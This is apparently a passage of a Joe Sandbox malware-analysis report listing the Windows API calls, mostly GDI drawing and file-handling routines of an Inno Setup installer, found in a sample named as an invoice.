      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
      • Part of subcall function 004CE410: GetLastError.KERNEL32(00000000,004CE619,?,0050BE1C,00000000,00000000,00000000,00000000,?,004CE98A,?,00000000,004CEAD4,?,?,0050BE1C), ref: 004CE4E9
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00000008,00000005,00000000,00000000), ref: 004CE567
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004CE58C
    • DeleteFileW.KERNEL32(00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4,?,004D2980,004D65D7), ref: 004D2292
    • DeleteFileW.KERNEL32(00000000,00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4,?,004D2980), ref: 004D22A0
      • Part of subcall function 0047EB44: GetFileAttributesW.KERNEL32(00000000,00000000,004ABD07,00000000,?), ref: 0047EB4F
    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D22C0
    • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4), ref: 004D22CE
      • Part of subcall function 004D1F40: GetFileAttributesW.KERNEL32(00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB,00000000,00000000,00000000), ref: 004D1F64
      • Part of subcall function 004D1F40: DeleteFileW.KERNEL32(00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB), ref: 004D1FBF
      • Part of subcall function 004D1F40: DeleteFileW.KERNEL32(00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000), ref: 004D1FE2
      • Part of subcall function 004D1F40: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000), ref: 004D1FFB
      • Part of subcall function 004D1F40: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000), ref: 004D2001
    • SHChangeNotify.SHELL32(00000008,00000005,00000000,00000000), ref: 004D23E5
    • SHChangeNotify.SHELL32(00000002,00000005,00000000,00000000), ref: 004D23FB
    • SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004D2420
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetObjectW.GDI32(00000000,00000054,?), ref: 00434B33
    • GetDC.USER32(00000000), ref: 00434B61
    • CreateCompatibleDC.GDI32(?), ref: 00434B72
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00434B8D
    • SelectObject.GDI32(?,00000000), ref: 00434BA7
    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00434BC9
    • CreateCompatibleDC.GDI32(?), ref: 00434BD7
    • DeleteDC.GDI32(00000000), ref: 00434CBD
      • Part of subcall function 00434448: GetObjectW.GDI32(00000000,00000054,?), ref: 004344C8
      • Part of subcall function 00434448: GetDC.USER32(00000000), ref: 004344D9
      • Part of subcall function 00434448: CreateCompatibleDC.GDI32(00000000), ref: 004344EA
      • Part of subcall function 00434448: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00434536
      • Part of subcall function 00434448: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043455A
      • Part of subcall function 00434448: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004345AA
      • Part of subcall function 00434448: GetDeviceCaps.GDI32(00000000,0000000E), ref: 004345B7
      • Part of subcall function 00434448: SelectObject.GDI32(?,00000000), ref: 00434661
      • Part of subcall function 00434448: GetDIBColorTable.GDI32(?,00000000,00000100,-00000028), ref: 00434687
      • Part of subcall function 00434448: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 004346B2
      • Part of subcall function 00434448: SelectObject.GDI32(?,00000054), ref: 004346BF
      • Part of subcall function 00434448: CreateDIBSection.GDI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434715
      • Part of subcall function 00434448: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 00434776
      • Part of subcall function 00434448: SelectObject.GDI32(?,?), ref: 004347B7
      • Part of subcall function 00434448: SelectPalette.GDI32(?,00000000,00000000), ref: 004347F7
      • Part of subcall function 00434448: RealizePalette.GDI32(?), ref: 00434803
      • Part of subcall function 00434448: FillRect.USER32(?,00434A14,00434A14), ref: 00434854
      • Part of subcall function 00434448: SetTextColor.GDI32(?,00000000), ref: 0043486C
      • Part of subcall function 00434448: SetBkColor.GDI32(?,00000000), ref: 00434886
      • Part of subcall function 00434448: SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 004348CE
      • Part of subcall function 00434448: PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 004348F0
      • Part of subcall function 00434448: CreateCompatibleDC.GDI32(00000000), ref: 00434903
      • Part of subcall function 00434448: SelectObject.GDI32(00434D0B,00000000), ref: 00434926
      • Part of subcall function 00434448: SelectPalette.GDI32(00434D0B,00000000,00000000), ref: 00434942
      • Part of subcall function 00434448: RealizePalette.GDI32(00434D0B), ref: 0043494D
      • Part of subcall function 00434448: SetTextColor.GDI32(00434D0B,00000000), ref: 0043496B
      • Part of subcall function 00434448: SetBkColor.GDI32(00434D0B,00000000), ref: 00434985
      • Part of subcall function 00434448: BitBlt.GDI32(?,00000000,00000000,?,?,00434D0B,00000000,00000000,00CC0020), ref: 004349AD
      • Part of subcall function 00434448: SelectPalette.GDI32(00434D0B,00000000,000000FF), ref: 004349BF
      • Part of subcall function 00434448: SelectObject.GDI32(00434D0B,00000000), ref: 004349C9
      • Part of subcall function 00434448: DeleteDC.GDI32(00434D0B), ref: 004349E4
      • Part of subcall function 00434448: SelectPalette.GDI32(?,00000000,000000FF), ref: 00434A0E
    • SelectObject.GDI32(00000000,00000000), ref: 00434C1F
    • SelectPalette.GDI32(00000000,?,00000000), ref: 00434C32
    • RealizePalette.GDI32(00000000), ref: 00434C3B
    • SelectPalette.GDI32(?,?,00000000), ref: 00434C47
    • RealizePalette.GDI32(?), ref: 00434C50
    • SetBkColor.GDI32(00000000,00000000), ref: 00434C5A
    • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00434C7E
    • SetBkColor.GDI32(00000000,00000000), ref: 00434C88
    • SelectObject.GDI32(00000000,00000000), ref: 00434C9B
    • DeleteObject.GDI32(00000000), ref: 00434CA7
    • SelectObject.GDI32(?,00000000), ref: 00434CD8
    • DeleteDC.GDI32(00000000), ref: 00434CF4
    • ReleaseDC.USER32(00000000,00000000), ref: 00434D05
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • MulDiv.KERNEL32(?,00000001,000000FF), ref: 004E48C1
    • MulDiv.KERNEL32(?,00000000,000000FF), ref: 004E48D5
    • MulDiv.KERNEL32(?,00000001,000000FF), ref: 004E4907
    • MulDiv.KERNEL32(?,00000000,000000FF), ref: 004E4917
      • Part of subcall function 00431E8C: FillRect.USER32(?,?,00000000), ref: 00431EB5
    • SetBkMode.GDI32(00000000,00000001), ref: 004E4945
      • Part of subcall function 00480244: IsDBCSLeadByte.KERNEL32(?,?,?,00000910,00000000,004E4994,0000001D,Arial), ref: 00480268
    • InflateRect.USER32(?,000000F8,000000F8), ref: 004E49CA
    • OffsetRect.USER32(?,000000FC,00000004), ref: 004E49EE
    • OffsetRect.USER32(?,00000004,00000004), ref: 004E49FD
    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4A26
    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4A52
    • InflateRect.USER32(?,000000FA,000000FA), ref: 004E4A96
    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4ACA
    • OffsetRect.USER32(?,000000FF,00000001), ref: 004E4AFC
    • OffsetRect.USER32(?,00000001,00000001), ref: 004E4B0B
    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4B34
    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4B60
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 0043613C
    • CreateCompatibleDC.GDI32(00000001), ref: 004361A1
    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004361B6
    • SelectObject.GDI32(?,00000000), ref: 004361C0
    • DeleteObject.GDI32(00000000), ref: 00436273
      • Part of subcall function 00433044: CreateCompatibleDC.GDI32(00000000), ref: 0043305D
      • Part of subcall function 00433044: SelectObject.GDI32(00000000,00000000), ref: 00433066
      • Part of subcall function 00433044: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0043307A
      • Part of subcall function 00433044: SelectObject.GDI32(00000000,00000000), ref: 00433086
      • Part of subcall function 00433044: DeleteDC.GDI32(00000000), ref: 0043308C
      • Part of subcall function 00433044: CreatePalette.GDI32 ref: 004330D3
    • SelectPalette.GDI32(?,?,00000000), ref: 004361F0
    • RealizePalette.GDI32(?), ref: 004361FC
    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00436220
    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00436279,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0043622E
    • SelectPalette.GDI32(?,00000000,000000FF), ref: 00436260
    • SelectObject.GDI32(?,?), ref: 0043626D
    • CreateDIBSection.GDI32(00000001,?,00000000,00000000,00000000,00000000), ref: 004362BE
    • GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,0043633D,?,00000000,?,00000000,004363EF,?,?), ref: 004362D2
      • Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC
    • ReleaseDC.USER32(00000000,00000001), ref: 00436337
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • AllocateAndInitializeSid.ADVAPI32(00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00480027
    • GetVersion.KERNEL32(00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00480044
    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048005E
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • GetCurrentThread.KERNEL32(00000008,000000FF,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048009F
    • OpenThreadToken.ADVAPI32(00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 004800A5
    • GetLastError.KERNEL32(00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 004800AE
    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000), ref: 004800CA
    • OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000), ref: 004800D0
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,004FDD8E,00000000,004801B2,?,00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4), ref: 00480104
    • GetLastError.KERNEL32(?,00000002,00000000,00000000,004FDD8E,00000000,004801B2,?,00000000,00000008,000000FF,?,00000000,004801D0,?,00503DD4), ref: 0048010D
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,004FDD8E,004FDD8E,?,00000002,00000000,00000000,004FDD8E,00000000,004801B2,?,00000000,00000008,000000FF), ref: 00480143
    • EqualSid.ADVAPI32(00000000,?,?,00000002,00000000,004FDD8E,004FDD8E,?,00000002,00000000,00000000,004FDD8E,00000000,004801B2,?,00000000), ref: 00480171
    • CloseHandle.KERNEL32(?), ref: 004801AC
    • FreeSid.ADVAPI32(00000000,004801D7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004801CA
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1
      • Part of subcall function 0047F29C: GetCommandLineW.KERNEL32(00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F,?,?,?,?,00000000), ref: 0047F2E7
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    • ShowWindow.USER32(?,00000005), ref: 004FE31B
      • Part of subcall function 00409458: CreateMutexW.KERNEL32(?,?,?,?,004FE333,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?), ref: 0040946E
    • ShowWindow.USER32(?,00000000), ref: 004FE341
    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004FE362
    • ShowWindow.USER32(?,00000005), ref: 004FE377
      • Part of subcall function 0047EB44: GetFileAttributesW.KERNEL32(00000000,00000000,004ABD07,00000000,?), ref: 0047EB4F
    • CloseHandle.KERNEL32(00000000), ref: 004FE633
      • Part of subcall function 004DE8AC: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE937
      • Part of subcall function 004DE8AC: GetLastError.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE940
      • Part of subcall function 004B197C: LoadTypeLib.OLEAUT32(00000000,00000000), ref: 004B19BF
      • Part of subcall function 004B197C: RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 004B19DB
    • DeleteFileW.KERNEL32(00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5D9
    • DeleteFileW.KERNEL32(00000000,00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5E7
    • ReleaseMutex.KERNEL32(00000000,004FE640,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE62A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD5D8: GetLastError.KERNEL32(00000000,004AD62E,?,?,?,?,?,?,?,?,?,?,004B6117,00000000,004B62D8), ref: 004AD610
    • SHChangeNotify.SHELL32(00000004,00000005,00000000,00000000), ref: 004B6293
      • Part of subcall function 004AD6C0: SetFileAttributesW.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD6FB
      • Part of subcall function 004AD6C0: GetLastError.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD703
      • Part of subcall function 004B1C94: SHCreateItemFromParsingName.SHELL32(00000000,00000000,00504364,?), ref: 004B1CE9
      • Part of subcall function 004B1C94: CoCreateInstance.OLE32(00504344,00000000,00000001,00504354,00000000), ref: 004B1D16
      • Part of subcall function 004AD13C: DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD173
      • Part of subcall function 004AD13C: GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD17B
    • GetLastError.KERNEL32(00000000,004B62D8,?,?,?,?,00000005,00000000,00000000,?,?,004B76B1,00000000,00000000,?,00000000), ref: 004B618C
      • Part of subcall function 004AD314: GetFileAttributesW.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD34D
      • Part of subcall function 004AD314: GetLastError.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD355
      • Part of subcall function 004AE5E8: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE6CE
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
      • Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000), ref: 00435CDD
      • Part of subcall function 00435C44: ReleaseDC.USER32(00000000,00000000), ref: 00435CE8
    • SelectPalette.GDI32(?,?,000000FF), ref: 0043533B
    • RealizePalette.GDI32(?), ref: 0043534A
    • GetDeviceCaps.GDI32(?,0000000C), ref: 0043535C
    • GetDeviceCaps.GDI32(?,0000000E), ref: 0043536B
    • GetBrushOrgEx.GDI32(?,?), ref: 0043539E
    • SetStretchBltMode.GDI32(?,00000004), ref: 004353AC
    • SetBrushOrgEx.GDI32(?,?,?,?), ref: 004353C4
    • SetStretchBltMode.GDI32(00000000,00000003), ref: 004353E1
    • SelectPalette.GDI32(?,?,000000FF), ref: 00435599
      • Part of subcall function 00435BE4: DeleteObject.GDI32(?), ref: 00435C07
    • CreateCompatibleDC.GDI32(00000000), ref: 00435442
    • SelectObject.GDI32(?,?), ref: 00435457
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00432B3F
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432B54
      • Part of subcall function 00432AFC: MaskBlt.GDI32(?,?,?,?,?,?,00000000,00431C22,?,?,?,CCAA0029), ref: 00432B98
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432BB2
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432BBE
      • Part of subcall function 00432AFC: CreateCompatibleDC.GDI32(00000000), ref: 00432BD2
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00432BF3
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432C08
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,00000000), ref: 00432C1C
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,?,00000000), ref: 00432C2E
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,000000FF), ref: 00432C43
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,000000FF), ref: 00432C59
      • Part of subcall function 00432AFC: RealizePalette.GDI32(?), ref: 00432C65
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00432C87
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00431C22,?,?,00440328), ref: 00432CA9
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00000000), ref: 00432CB1
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00FFFFFF), ref: 00432CBF
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00432CEB
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00432D10
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00431C22), ref: 00432D1A
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00000000), ref: 00432D24
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,00000000), ref: 00432D37
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432D40
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,00000000), ref: 00432D62
      • Part of subcall function 00432AFC: DeleteDC.GDI32(?), ref: 00432D6B
    • SelectObject.GDI32(?,00000000), ref: 004354B6
    • DeleteDC.GDI32(00000000), ref: 004354C5
    • AlphaBlend.MSIMG32(00000000,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,0000000E,00000000,?,0000000C), ref: 00435523
    • AlphaBlend.MSIMG32(00000000,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,0000000E,00000000,?,0000000C), ref: 00435574
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
      • Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
      • Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000), ref: 00435CDD
      • Part of subcall function 00435C44: ReleaseDC.USER32(00000000,00000000), ref: 00435CE8
    • SelectPalette.GDI32(?,?,000000FF), ref: 0043508F
    • RealizePalette.GDI32(?), ref: 0043509E
    • GetDeviceCaps.GDI32(?,0000000C), ref: 004350B0
    • GetDeviceCaps.GDI32(?,0000000E), ref: 004350BF
    • GetBrushOrgEx.GDI32(?,?), ref: 004350F2
    • SetStretchBltMode.GDI32(?,00000004), ref: 00435100
    • SetBrushOrgEx.GDI32(?,?,?,?), ref: 00435118
    • SetStretchBltMode.GDI32(00000000,00000003), ref: 00435135
    • SelectPalette.GDI32(?,?,000000FF), ref: 004352DD
      • Part of subcall function 00435BE4: DeleteObject.GDI32(?), ref: 00435C07
    • CreateCompatibleDC.GDI32(00000000), ref: 00435196
    • SelectObject.GDI32(?,?), ref: 004351AB
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00432B3F
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432B54
      • Part of subcall function 00432AFC: MaskBlt.GDI32(?,?,?,?,?,?,00000000,00431C22,?,?,?,CCAA0029), ref: 00432B98
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432BB2
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432BBE
      • Part of subcall function 00432AFC: CreateCompatibleDC.GDI32(00000000), ref: 00432BD2
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00432BF3
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432C08
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,00000000), ref: 00432C1C
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,?,00000000), ref: 00432C2E
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,000000FF), ref: 00432C43
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,000000FF), ref: 00432C59
      • Part of subcall function 00432AFC: RealizePalette.GDI32(?), ref: 00432C65
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00432C87
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00431C22,?,?,00440328), ref: 00432CA9
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00000000), ref: 00432CB1
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00FFFFFF), ref: 00432CBF
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00432CEB
